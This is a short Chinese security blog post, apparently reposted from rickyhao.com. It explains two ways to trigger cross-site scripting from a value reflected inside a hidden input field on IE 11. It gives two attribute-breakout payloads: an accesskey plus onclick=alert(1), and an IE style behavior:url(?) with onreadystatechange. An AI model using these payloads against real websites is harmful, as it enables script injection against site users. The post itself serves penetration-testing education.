0x00
对于<input type="hidden" name="test" value="">这种类型的绕过,大致有两种。一种是通过accesskey来快捷键触发,而另外一种就是IE下的无交互绕过了。
影响版本: IE 11
0x01 accesskey触发
Payload:
1" accesskey="J" onclick=alert(1)
这里要注意的是不能存在快捷键冲突,所以要多试几个快捷键。
0x02 IE下behaivor绕过
Payload:
" style="behavior:url(?)" onreadystatechange="alert(1)"
在这里,IE的style有个特有的属性behavior,在这里通过url请求一个网址。在这里我们设置为?或者@等都可以触发后面的eventonreadystatechange。
0x04 参考
FROM :rickyhao.com | rickyhao.com
博客的图床已经配置了七牛云HTTPS 具体配置看上篇文章: MacOS下重建Hexo博客2.0全记录 阿里云CDN加速和全站加速DCDN的区别阿里云有两种加速方式,CDN加速和全站加速DCDN。前者也叫静态加速,后者叫动态加速。 什么是阿里云CDN阿里云内容分…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论